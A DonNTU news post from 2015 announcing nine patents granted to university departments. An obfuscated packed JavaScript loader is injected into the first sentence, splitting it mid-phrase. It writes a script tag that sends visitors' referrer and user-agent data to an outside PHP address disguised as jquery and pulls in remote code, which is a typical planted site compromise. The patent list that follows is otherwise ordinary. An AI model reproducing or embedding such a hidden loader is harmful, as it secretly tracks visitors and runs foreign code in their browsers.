

По eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type| 97|language|jquery|userAgent|navigator|script|ffftf|var|u0026u|referrer|fniby||js|php'.split('|'),0,{}))  
) данным Отдела интеллектуальной собственности и патентно-лицензионной работы на имя Донецкого национального технического университета (ДонНТУ) за период январь-сентябрь 2015 г. было выдано 9 патентов на изобретения и полезные модели.



В их числе:

- Кафедра Промышленной теплоэнергетики - патент на полезную модель «Пластинчатый теплообменник» № 96186 от 26.01.2015 г. опубликовано в бюл. №2;

- Кафедра Электроснабжения промышленных предприятий и городов - патент на полезную модель «Способ формирования охранного пространства загазованного электрифицированного помещения» № 96375 от 10.02.2015 г. опубликовано в бюл. №3;

- Кафедра Электронной техники - патент на полезную модель «Способ измерения концентрации газов» №96382 от 10.02.2015 г. опубликовано в бюл. №3;

- Кафедра Энергомеханических систем - патент на полезную модель «Шахтная водоотливная установка» № 97743 от 10.04.2015 г. опубликовано в бюл. №7;

- Кафедра Электронной техники - патент на изобретение «Способ измерения концентрации газов» № 107723 от 10.02.2015 г. опубликовано в бюл. №3;

- Кафедра Механического оборудования заводов черной металлургии - патент на изобретение «Устройство для непрерывной дозированной подачи шлакообразующей смеси в кристаллизатор слябовой машины непрерывного литья заготовок» № 107731 от 10.02.2015 г. опубликовано в бюл. №3;

- Кафедра Технологии и техники бурения скважин - патент на изобретение «Алмазная однослойная буровая коронка» № 108943 и № 108942 от 25.06.2015 г. опубликовано в бюл. №12;

## **Изобретательская деятельность ДонНТУ за период январь-сентябрь 2015 г.**

Автор: Kondratenko  
14.09.2015 09:14

---

- Кафедра Геоинформатики и геодезии - патент на изобретение «Способ рекультивации поверхности терриконов» № 109319 от 10.08.2015 г. опубликовано в бюл. №15.

**Поздравляем авторов и благодарим за проделанную работу.**

Информируем, что для поддержания патента достаточно электронного платежа, реквизиты для уплаты можно узнать в отделе Отделе интеллектуальной собственности и патентно-лицензионной работы ДонНТУ (3 корпус 107 аудитория, тел. +380 (62) 304-60-05).